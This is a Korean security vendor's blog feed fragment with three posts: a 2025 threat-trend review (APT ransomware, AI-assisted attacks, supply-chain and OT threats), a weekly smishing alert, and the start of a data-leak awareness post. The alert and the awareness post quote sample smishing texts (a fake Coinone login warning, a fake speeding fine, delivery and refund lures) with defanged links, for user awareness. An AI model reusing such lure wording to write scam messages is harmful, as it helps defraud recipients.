&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;1)&amp;nbsp;APT&amp;nbsp;조직들의&amp;nbsp;랜섬웨어&amp;nbsp;활용&amp;nbsp;본격화&amp;nbsp;&amp;nbsp;&lt;/b&gt; &lt;br /&gt;&lt;br /&gt;기존의&amp;nbsp;정보&amp;nbsp;수집&amp;nbsp;중심의&amp;nbsp;APT&amp;nbsp;공격과&amp;nbsp;달리,&amp;nbsp;2025년에는&amp;nbsp;데이터&amp;nbsp;암호화,&amp;nbsp;탈취,&amp;nbsp;협박을&amp;nbsp;결합한&amp;nbsp;복합&amp;nbsp;공격&amp;nbsp;전략을&amp;nbsp;구사하는&amp;nbsp;APT&amp;nbsp;조직들이&amp;nbsp;발견되었으며,&amp;nbsp;이는&amp;nbsp;APT&amp;nbsp;조직의&amp;nbsp;공격&amp;nbsp;목적이&amp;nbsp;정찰,&amp;nbsp;정보&amp;nbsp;탈취와&amp;nbsp;금전적&amp;nbsp;수익&amp;nbsp;창출의&amp;nbsp;경계를&amp;nbsp;넘어&amp;nbsp;다목적화되고&amp;nbsp;있음을&amp;nbsp;의미합니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;북한&amp;nbsp;국가&amp;nbsp;지원&amp;nbsp;해킹&amp;nbsp;그룹인&amp;nbsp;ScarCruft(APT37),&amp;nbsp;중국의&amp;nbsp;지원을&amp;nbsp;받는&amp;nbsp;Strom-2603그룹이&amp;nbsp;전통적인&amp;nbsp;첩보&amp;nbsp;활동과&amp;nbsp;더불어&amp;nbsp;암호화폐&amp;nbsp;거래소&amp;nbsp;공격,&amp;nbsp;랜섬웨어&amp;nbsp;배포&amp;nbsp;등&amp;nbsp;금전적&amp;nbsp;이익을&amp;nbsp;추구하는&amp;nbsp;활동을&amp;nbsp;병행하고&amp;nbsp;있음이&amp;nbsp;확인되었습니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;이러한&amp;nbsp;변화는&amp;nbsp;국가&amp;nbsp;차원의&amp;nbsp;자금&amp;nbsp;조달&amp;nbsp;수단으로서&amp;nbsp;사이버&amp;nbsp;범죄가&amp;nbsp;활용되고&amp;nbsp;있으며,&amp;nbsp;APT와&amp;nbsp;사이버&amp;nbsp;범죄&amp;nbsp;조직&amp;nbsp;간의&amp;nbsp;경계가&amp;nbsp;모호해지는&amp;nbsp;새로운&amp;nbsp;위협&amp;nbsp;환경이&amp;nbsp;조성되고&amp;nbsp;있다고&amp;nbsp;볼&amp;nbsp;수&amp;nbsp;있습니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;&lt;b&gt;2) AI기반 사이버 공격의 본격화&amp;nbsp;&lt;/b&gt; &lt;br /&gt;&lt;br /&gt;2025년은&amp;nbsp;사이버&amp;nbsp;보안&amp;nbsp;분야에서&amp;nbsp;AI의&amp;nbsp;위협적&amp;nbsp;활용이&amp;nbsp;현실화되면서,&amp;nbsp;AI를&amp;nbsp;무기로&amp;nbsp;한&amp;nbsp;공격&amp;nbsp;시대가&amp;nbsp;본격&amp;nbsp;개막된&amp;nbsp;해였습니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;단순&amp;nbsp;취약점&amp;nbsp;익스플로잇이&amp;nbsp;아닌&amp;nbsp;AI&amp;nbsp;기술을&amp;nbsp;활용한&amp;nbsp;AI-powered&amp;nbsp;랜섬웨어가&amp;nbsp;확인되었고,&amp;nbsp;한&amp;nbsp;AI가&amp;nbsp;생성한&amp;nbsp;합성&amp;nbsp;음성을&amp;nbsp;활용한&amp;nbsp;CEO&amp;nbsp;사칭&amp;nbsp;사기,&amp;nbsp;실시간&amp;nbsp;얼굴&amp;nbsp;교체&amp;nbsp;기술을&amp;nbsp;이용한&amp;nbsp;화상&amp;nbsp;면접&amp;nbsp;해킹&amp;nbsp;등&amp;nbsp;새로운&amp;nbsp;유형의&amp;nbsp;공격도&amp;nbsp;증가했습니다.&amp;nbsp;특히&amp;nbsp;AI의&amp;nbsp;활용은&amp;nbsp;공격&amp;nbsp;코드의&amp;nbsp;생성&amp;nbsp;속도를&amp;nbsp;극적으로&amp;nbsp;높이고&amp;nbsp;대규모의&amp;nbsp;표적&amp;nbsp;맞춤형&amp;nbsp;피싱&amp;nbsp;공격을&amp;nbsp;자동화하며&amp;nbsp;위협의&amp;nbsp;규모와&amp;nbsp;정교함을&amp;nbsp;한&amp;nbsp;차원&amp;nbsp;끌어올렸다는&amp;nbsp;중요한&amp;nbsp;특징이&amp;nbsp;있습니다.&amp;nbsp; &lt;br /&gt;&lt;br /&gt;&lt;b&gt;3)&amp;nbsp;대규모&amp;nbsp;서비스&amp;nbsp;기업&amp;nbsp;중심의&amp;nbsp;사이버&amp;nbsp;공격&amp;nbsp;확산&amp;nbsp;&amp;nbsp;&lt;/b&gt; &lt;br /&gt;&lt;br /&gt;2025년에는&amp;nbsp;국내&amp;nbsp;핵심&amp;nbsp;디지털&amp;nbsp;서비스&amp;nbsp;기업을&amp;nbsp;겨냥한&amp;nbsp;공격이&amp;nbsp;전례&amp;nbsp;없이&amp;nbsp;빈번하게&amp;nbsp;발생하며,&amp;nbsp;대규모&amp;nbsp;플랫폼&amp;nbsp;중심의&amp;nbsp;사이버&amp;nbsp;리스크가&amp;nbsp;한층&amp;nbsp;부각된&amp;nbsp;한&amp;nbsp;해였습니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;특히&amp;nbsp;통신,&amp;nbsp;전자상거래,&amp;nbsp;금융&amp;nbsp;등&amp;nbsp;일상생활과&amp;nbsp;산업&amp;nbsp;전반을&amp;nbsp;지탱하는&amp;nbsp;인프라&amp;nbsp;기업들이&amp;nbsp;공격&amp;nbsp;시도의&amp;nbsp;주요&amp;nbsp;표적이&amp;nbsp;되었고,&amp;nbsp;일부&amp;nbsp;조직에서는&amp;nbsp;내부&amp;nbsp;계정&amp;nbsp;탈취,&amp;nbsp;주요&amp;nbsp;시스템&amp;nbsp;마비,&amp;nbsp;대규모&amp;nbsp;개인정보&amp;nbsp;유출&amp;nbsp;등&amp;nbsp;심각한&amp;nbsp;사고가&amp;nbsp;발생했습니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;사회적&amp;nbsp;파급력이&amp;nbsp;큰&amp;nbsp;서비스&amp;nbsp;영역을&amp;nbsp;중심으로&amp;nbsp;정교한&amp;nbsp;침투&amp;nbsp;기법과&amp;nbsp;공격&amp;nbsp;경로가&amp;nbsp;반복적으로&amp;nbsp;활용되면서,&amp;nbsp;유출된&amp;nbsp;개인정보들을&amp;nbsp;활용한&amp;nbsp;2차&amp;nbsp;피해도&amp;nbsp;우려되고&amp;nbsp;있습니다.&amp;nbsp; &lt;br /&gt;&lt;br /&gt;이러한&amp;nbsp;사이버&amp;nbsp;공격의&amp;nbsp;흐름을&amp;nbsp;통해&amp;nbsp;공격자들이&amp;nbsp;단순한&amp;nbsp;취약점이&amp;nbsp;아닌&amp;nbsp;대규모&amp;nbsp;사용자&amp;nbsp;기반과&amp;nbsp;높은&amp;nbsp;경제적&amp;nbsp;가치를&amp;nbsp;기준으로&amp;nbsp;목표를&amp;nbsp;선정하고&amp;nbsp;있다는&amp;nbsp;점을&amp;nbsp;알&amp;nbsp;수&amp;nbsp;있습니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;&lt;b&gt;4) 공급망 공격 지속 및 확산&amp;nbsp;&amp;nbsp;&lt;/b&gt; &lt;br /&gt;&lt;br /&gt;다양한&amp;nbsp;산업군에서&amp;nbsp;공급망&amp;nbsp;공격이&amp;nbsp;연속적으로&amp;nbsp;발생하며,&amp;nbsp;신뢰된&amp;nbsp;개발/운영&amp;nbsp;생태계가&amp;nbsp;공격의&amp;nbsp;주요&amp;nbsp;경로로&amp;nbsp;활용되는&amp;nbsp;경향이&amp;nbsp;더욱&amp;nbsp;강화되었습니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;3월에는&amp;nbsp;GitHub&amp;nbsp;Actions&amp;nbsp;워크플로가&amp;nbsp;공격자에&amp;nbsp;의해&amp;nbsp;변조되는&amp;nbsp;CI/CD&amp;nbsp;공급망&amp;nbsp;공격&amp;nbsp;발견되며&amp;nbsp;개발자가&amp;nbsp;사용하는&amp;nbsp;자동화&amp;nbsp;도구&amp;nbsp;자체가&amp;nbsp;위협&amp;nbsp;벡터로&amp;nbsp;사용될&amp;nbsp;수&amp;nbsp;있음이&amp;nbsp;확인되었습니다.&amp;nbsp;또한&amp;nbsp;GlassWorm&amp;nbsp;사례처럼&amp;nbsp;신뢰된&amp;nbsp;오픈소스&amp;nbsp;패키지를&amp;nbsp;조용히&amp;nbsp;변조해&amp;nbsp;장기간&amp;nbsp;잠복하는&amp;nbsp;형태의&amp;nbsp;공격이&amp;nbsp;광범위한&amp;nbsp;생태계에&amp;nbsp;확산될&amp;nbsp;수&amp;nbsp;있음도&amp;nbsp;확인되었습니다.&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;공격자들이&amp;nbsp;더&amp;nbsp;이상&amp;nbsp;단일&amp;nbsp;시스템을&amp;nbsp;공격하지&amp;nbsp;않고,&amp;nbsp;서드파티,&amp;nbsp;&amp;nbsp;패키지,&amp;nbsp;CI/CD,&amp;nbsp;지갑&amp;nbsp;등&amp;nbsp;소프트웨어&amp;nbsp;공급망&amp;nbsp;전반을&amp;nbsp;노려&amp;nbsp;대규모&amp;nbsp;확산을&amp;nbsp;추구하고&amp;nbsp;있는&amp;nbsp;형태로&amp;nbsp;공격이&amp;nbsp;변화하고&amp;nbsp;있다는&amp;nbsp;점을&amp;nbsp;알&amp;nbsp;수&amp;nbsp;있습니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;&lt;b&gt;5) OT 보안위협의 현실화 및 공격 표면 확대&amp;nbsp;&amp;nbsp;&lt;/b&gt; &lt;br /&gt;&lt;br /&gt;IT/OT&amp;nbsp;결합이&amp;nbsp;가속화&amp;nbsp;되면서,&amp;nbsp;과거에&amp;nbsp;분리&amp;nbsp;운영되었던&amp;nbsp;OT&amp;nbsp;시스템에서&amp;nbsp;IT&amp;nbsp;환경의&amp;nbsp;위협이&amp;nbsp;그대로&amp;nbsp;전파될&amp;nbsp;수&amp;nbsp;있는&amp;nbsp;구조로&amp;nbsp;변화하고&amp;nbsp;있습니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;레거시&amp;nbsp;시스템,&amp;nbsp;취약한&amp;nbsp;인증&amp;nbsp;및&amp;nbsp;원격&amp;nbsp;접근,&amp;nbsp;기본&amp;nbsp;설정&amp;nbsp;사용&amp;nbsp;등&amp;nbsp;많은&amp;nbsp;OT&amp;nbsp;환경이&amp;nbsp;여전히&amp;nbsp;안전성을&amp;nbsp;이유로&amp;nbsp;패치되지&amp;nbsp;않은&amp;nbsp;오래된&amp;nbsp;OS나&amp;nbsp;보안&amp;nbsp;기능이&amp;nbsp;취약한&amp;nbsp;장비를&amp;nbsp;사용하며,&amp;nbsp;다요소&amp;nbsp;인증(MFA)이나&amp;nbsp;강력한&amp;nbsp;접근&amp;nbsp;제어&amp;nbsp;없이&amp;nbsp;운영되는&amp;nbsp;경우가&amp;nbsp;많이&amp;nbsp;있습니다.&amp;nbsp;또한&amp;nbsp;원격&amp;nbsp;접근기능&amp;nbsp;확대와&amp;nbsp;클라우드&amp;nbsp;연동&amp;nbsp;증가로&amp;nbsp;인해&amp;nbsp;OT&amp;nbsp;환경의&amp;nbsp;공격&amp;nbsp;표면이&amp;nbsp;크게&amp;nbsp;증가하고&amp;nbsp;있습니다.&amp;nbsp;&amp;nbsp; &lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2025년 한 해동안 발생한 보안이슈들을 정리해 보았으며, 2026년도 보안이슈들을 전망해 보았습니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이스트시큐리티는 2026년도에도 안전한 세상을 만들수 있도록 최선을 다하겠습니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;새해 복 많이 받으세요.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;감사합니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;AdobeStock_1551660470.jpeg&quot; data-origin-width=&quot;5248&quot; data-origin-height=&quot;2944&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bzbJVv/dJMcafd7KhP/EdObek37FYqJqgSq4GPVPK/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bzbJVv/dJMcafd7KhP/EdObek37FYqJqgSq4GPVPK/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bzbJVv/dJMcafd7KhP/EdObek37FYqJqgSq4GPVPK/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbzbJVv%2FdJMcafd7KhP%2FEdObek37FYqJqgSq4GPVPK%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;500&quot; height=&quot;280&quot; data-filename=&quot;AdobeStock_1551660470.jpeg&quot; data-origin-width=&quot;5248&quot; data-origin-height=&quot;2944&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>전문가 기고</category>
      <category>2026사이버보안</category>
      <category>보안동향</category>
      <category>보안동향리포트</category>
      <category>보안동향보고서</category>
      <category>보안위협동향</category>
      <category>사이버보안</category>
      <category>이스트시큐리티</category>
      <author>알약4</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5690</guid>
      <comments>https://alyacofficialblog.tistory.com/5690#entry5690comment</comments>
      <pubDate>Mon, 22 Dec 2025 09:49:52 +0900</pubDate>
    </item>
    <item>
      <title>[Web발신][Coinone로그인알림]고객님계정이 해외에서 로그인감지되었습니다. hxxp://www.coino***.sbs</title>
      <link>https://alyacofficialblog.tistory.com/5689</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;다운로드.png&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/lfHeI/dJMcagRzcu3/YNKE5e9XjHrEzHqyXI5A70/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/lfHeI/dJMcagRzcu3/YNKE5e9XjHrEzHqyXI5A70/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/lfHeI/dJMcagRzcu3/YNKE5e9XjHrEzHqyXI5A70/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FlfHeI%2FdJMcagRzcu3%2FYNKE5e9XjHrEzHqyXI5A70%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;692&quot; height=&quot;440&quot; data-filename=&quot;다운로드.png&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #409d00;&quot;&gt;&lt;b&gt;[12월 둘째주]&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;알약&amp;nbsp;스미싱&amp;nbsp;알림&amp;nbsp;본&amp;nbsp;포스트는&amp;nbsp;알약M&amp;nbsp;사용자&amp;nbsp;분들이&amp;nbsp;'신고하기'&amp;nbsp;기능을&amp;nbsp;통해&amp;nbsp;알약으로&amp;nbsp;신고해&amp;nbsp;주신&amp;nbsp;스미싱&amp;nbsp;내역&amp;nbsp;중&amp;nbsp;'특이&amp;nbsp;문자'를&amp;nbsp;자체&amp;nbsp;수집,&amp;nbsp;집계하여&amp;nbsp;제공해&amp;nbsp;드리는&amp;nbsp;정보성&amp;nbsp;포스트입니다.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: #409d00;&quot;&gt;&lt;b&gt;특이 문자&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;div style=&quot;color: #333333; text-align: start;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-style=&quot;style14&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;background-color: #008300; color: #ffffff; text-align: center;&quot;&gt;No.&lt;/td&gt;
&lt;td style=&quot;background-color: #008300; color: #ffffff; text-align: center;&quot;&gt;문자내용&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;background-color: #efefef; text-align: center;&quot;&gt;1&lt;/td&gt;
&lt;td&gt;[Web발신][Coinone로그인알림]고객님계정이 해외에서 로그인감지되었습니다. hxxp://www.coino***.sbs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;background-color: #efefef; text-align: center;&quot;&gt;2&lt;/td&gt;
&lt;td&gt;[Web발신]교통24 속도위반 [50.00]원부과. 납부: [hxxps://m.site.naver.com/1****L]에서 확인요망.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;다운로드 (1).png&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Ab5IN/dJMcadHg0FN/WugRQsMXguG1AsbeigsgWK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Ab5IN/dJMcadHg0FN/WugRQsMXguG1AsbeigsgWK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Ab5IN/dJMcadHg0FN/WugRQsMXguG1AsbeigsgWK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FAb5IN%2FdJMcadHg0FN%2FWugRQsMXguG1AsbeigsgWK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;400&quot; height=&quot;150&quot; data-filename=&quot;다운로드 (1).png&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;출처&amp;nbsp;:&amp;nbsp;알약M&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;기간 : 2025년 12월 6일 ~ 2025년 12월 12일&lt;/p&gt;</description>
      <category>안전한 PC&amp;amp;모바일 세상/스미싱 알림</category>
      <author>알약4</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5689</guid>
      <comments>https://alyacofficialblog.tistory.com/5689#entry5689comment</comments>
      <pubDate>Fri, 12 Dec 2025 14:30:34 +0900</pubDate>
    </item>
    <item>
      <title>최근 빈번한 개인정보 유출 이슈, 모바일&amp;middot;PC 모두에서 필요한 진짜 보안 대비는?</title>
      <link>https://alyacofficialblog.tistory.com/5688</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div&gt;
&lt;div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;최근 국내 대형 이커머스 플랫폼을 포함한 여러 산업 분야에서 개인정보 유출 사고가 연달아 발생하며, 이용자 여러분의 걱정과 불안이 그 어느 때보다 커지고 있습니다. 이름&amp;middot;전화번호&amp;middot;주소 등 비교적 단순해 보이는 정보라도 공격자의 손에 들어가면 정교한 스미싱&amp;middot;피싱 공격으로 빠르게 전환되는 패턴이 반복적으로 관찰되고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;특히 대규모 유출 사고가 발생하면, 그 직후부터 관련 스미싱 공격량이 급증하는 것이 주요 보안기관에서도 수차례 확인된 바 있는데요. 이러한 흐름 속에서 모바일과 PC를 모두 아우르는 보안 체계의 필요성은 점점 더 중요해지고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;오늘은 최근 유출 이슈에서 확인되는 공격 패턴과 함께, 사용자가 일상에서 실질적으로 대비할 수 있는 보안 방법을 소개하고자 합니다.&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;AdobeStock_1453186951 1.png&quot; data-origin-width=&quot;2100&quot; data-origin-height=&quot;1400&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/AwBnj/dJMcagjG5rY/vGk9g4wrgK6VUgb8kpts0k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/AwBnj/dJMcagjG5rY/vGk9g4wrgK6VUgb8kpts0k/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/AwBnj/dJMcagjG5rY/vGk9g4wrgK6VUgb8kpts0k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FAwBnj%2FdJMcagjG5rY%2FvGk9g4wrgK6VUgb8kpts0k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;2100&quot; height=&quot;1400&quot; data-filename=&quot;AdobeStock_1453186951 1.png&quot; data-origin-width=&quot;2100&quot; data-origin-height=&quot;1400&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;1. 개인정보 유출이 &amp;lsquo;공격&amp;rsquo;으로 이어지는 이유&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;div&gt;
&lt;div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;개인정보가 외부로 유출되면 공격자들은 다음과 같은 특징을 활용해 맞춤형 공격을 설계합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;☑︎ 이름, 연락처 기반 스미싱&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote data-ke-style=&quot;style2&quot;&gt;&lt;b&gt;&amp;nbsp;&quot;[이름]님, 주문이 취소되었습니다. 환불을 위해 확인이 필요합니다&quot;&lt;/b&gt;&lt;/blockquote&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;실제 이름과 최근 주문 정보를 언급하며 신뢰도를 높이는 수법입니다. 공격자는 유출된 정보를 바탕으로 수신자가 실제로 해당 서비스를 이용했을 가능성이 높다는 점을 활용합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;☑︎ 주소 기반 타깃 메시지&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote data-ke-style=&quot;style2&quot;&gt;&lt;b&gt;&quot;[지역명] 배송센터입니다. 택배가 반송 예정이니 확인 부탁드립니다&quot;&lt;/b&gt;&lt;/blockquote&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;실제 거주 지역을 언급해 사용자의 경계심을 무너뜨립니다. 특히 아파트 단지나 주요 지역명을 포함하면 &quot;진짜 택배 관련 문자&quot;로 착각하기 쉽습니다.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
